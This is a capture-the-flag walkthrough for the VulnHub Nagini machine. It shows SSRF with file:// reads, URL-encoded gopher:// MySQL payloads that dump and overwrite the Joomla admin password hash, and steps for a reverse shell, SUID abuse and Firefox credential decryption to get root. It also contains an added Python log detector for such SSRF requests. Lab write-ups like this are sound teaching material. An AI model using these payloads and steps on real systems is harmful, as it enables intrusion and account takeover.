https://www.vulnhub.com/entry/harrypotter-nagini,689/
Very interesting machine; it was my first time doing SSRF with Gopher.
Scan the ports with nmap first.
nmap -sV -sC -p- 192.168.56.99 -oN ports.log
Enumerate port 80 with gobuster; it finds note.txt and a Joomla CMS.
gobuster dir -u http://192.168.56.98 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
note.txt tells us we need to use the HTTP/3 protocol.
Add quic.nagini.hogwarts to /etc/hosts. Then compile a custom curl following this tutorial:
https://github.com/curl/curl/blob/master/docs/HTTP3.md
Now we have a custom curl with HTTP/3 support.
Visiting the site over HTTP/3 gives us a new note with two hints: first, there is an internalResourceFeTcher.php; second, there is a configuration .bak file.
Checking internalResourceFeTcher.php, it is a PHP page that fetches whatever URL it is given, i.e. an SSRF.
Using the file:// scheme, we can read the contents of /etc/passwd.
curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///etc/passwd'
Then we can read Joomla's configuration.php (or configuration.php.bak) and get the MySQL user name.
The same file also gives us the database name and the table prefix of the Joomla CMS.
curl 'http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=file:///var/www/html/joomla/configuration.php'
After a lot of googling, and thanks to the hints from the guys on the @vulnhub Discord channel, I learned that the next step is to use gopher to run MySQL commands and get information.
Here we need a tool: https://github.com/tarunkant/Gopherus. Running gopherus generates the gopher link. Let's try the SQL command 'use joomla;show tables;'
gopher://127.0.0.1:3306/_%a6%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%65%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%18%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01
Then we need to URL-encode the gopher link. This is important; I was stuck here for a looooong time.
Then we have to visit the URL from a browser (curl does not work here). If no content is displayed, just refresh the page a few times.
http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2518%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2568%256f%2577%2520%2574%2561%2562%256c%2565%2573%253b%2501%2500%2500%2500%2501
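The double encoding above is also what a defender has to undo to see what the fetcher was actually asked to retrieve. The following Python is an added example, not code from the writeup or the box: it decodes the url parameter of access-log hits on internalResourceFeTcher.php until it stops changing, then flags non-HTTP schemes and loopback or private targets. The log lines, client IP and timestamps are constructed; only the endpoint name comes from the page.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Matches requests to the fetcher named in the writeup and captures its query string.
REQUEST_RE = re.compile(r'"(?:GET|POST) \S*?/internalResourceFeTcher\.php\?(\S*) HTTP/', re.I)
# Constructed Apache-style access log lines (not captured from the VM).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /internalResourceFeTcher.php?url=http://example.com/news HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /internalResourceFeTcher.php?url=file:///etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%2500%2501 HTTP/3" 200 33',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /internalResourceFeTcher.php?url=http://127.0.0.1:3306/ HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

def fully_decode(value, max_rounds=5):
    """Peel layered percent-encoding so 'gopher:%2f%2f...%2500' becomes 'gopher://...' plus raw bytes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_target(url_param):
    """Return 'ok' or the reason the fetch target should be blocked or alerted on."""
    parts = urlsplit(fully_decode(url_param))
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):        # file://, gopher://, dict:// ...
        return f"scheme:{scheme or 'none'}"
    host = (parts.hostname or "").lower()
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:                          # a hostname, not an IP literal
        return "internal-host" if host in ("", "localhost") else "ok"
    if addr.is_loopback or addr.is_private or addr.is_link_local:
        return f"internal-ip:{host}"
    return "ok"

def flag_fetcher_requests(log_lines):
    """Return [(reason, decoded_target), ...] for suspicious fetcher calls."""
    hits = []
    for m in filter(None, map(REQUEST_RE.search, log_lines)):   # fetcher hits only
        for target in parse_qs(m.group(1)).get("url", []):      # one decode layer here
            verdict = classify_target(target)
            if verdict != "ok":
                hits.append((verdict, fully_decode(target)))
    return hits
```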
Then we can check the contents of the table "joomla_users".
Use gopherus to generate the gopher link for "use joomla;select * from joomla_users;"
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%27%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01
Then visit the site again. Now we get the user name and password hash of "site_admin".
http://quic.nagini.hogwarts/internalResourceFeTcher.php?url=gopher:%2f%2f127.0.0.1:3306%2f_%25a5%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2567%256f%2562%256c%2569%256e%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2527%2500%2500%2500%2503%2575%2573%2565%2520%256a%256f%256f%256d%256c%2561%253b%2573%2565%256c%2565%2563%2574%2520%252a%2520%2566%2572%256f%256d%2520%256a%256f%256f%256d%256c%2561%255f%2575%2573%2565%2572%2573%253b%2501%2500%2500%2500%2501
The password hash cannot be cracked online, so we have to replace it. Let's use the MD5 hash of the string "password": 5f4dcc3b5aa765d61d8327deb882cf99.
Use gopherus to generate the link for the command:
use joomla; update joomla_users set password = '5f4dcc3b5aa765d61d8327deb882cf99' where username='site_admin';select * from joomla_users;
If it works, we will see the new password hash on the page.
Now we can log in to the Joomla control panel with site_admin:password.
In the template editor, we can create a new file rev.php containing reverse shell code, or directly add the reverse shell code to index.php.
Listen on port 1234, and visit http://192.168.56.99/joomla/templates/protostar/rev.php.
In snape's home folder, we find .creds.txt, which is snape's password, base64-encoded.
With this password, we can log in over SSH as user snape.
Looking for SUID files, we notice su_cp.
su_cp just copies a file from src to dest. So we can upload our id_rsa.pub and copy it to /home/hermoine/.ssh/authorized_keys.
Then we can log in over SSH as user hermoine without a password.
In the home folder, we find a .mozilla folder.
Copy the whole .mozilla folder to the local machine:
scp -rp hermoine@quic.nagini.hogwarts:/home/hermoine/.mozilla /tmp
Download the magic script from here: https://github.com/unode/firefox_decrypt
Then we can recover the root credentials with this script.
Thanks to wish@discord for the first writeup. You can check it here:
https://vishal-chandak.medium.com/vulnhub-harrypotter-nagini-walkthrough-68259262e9cf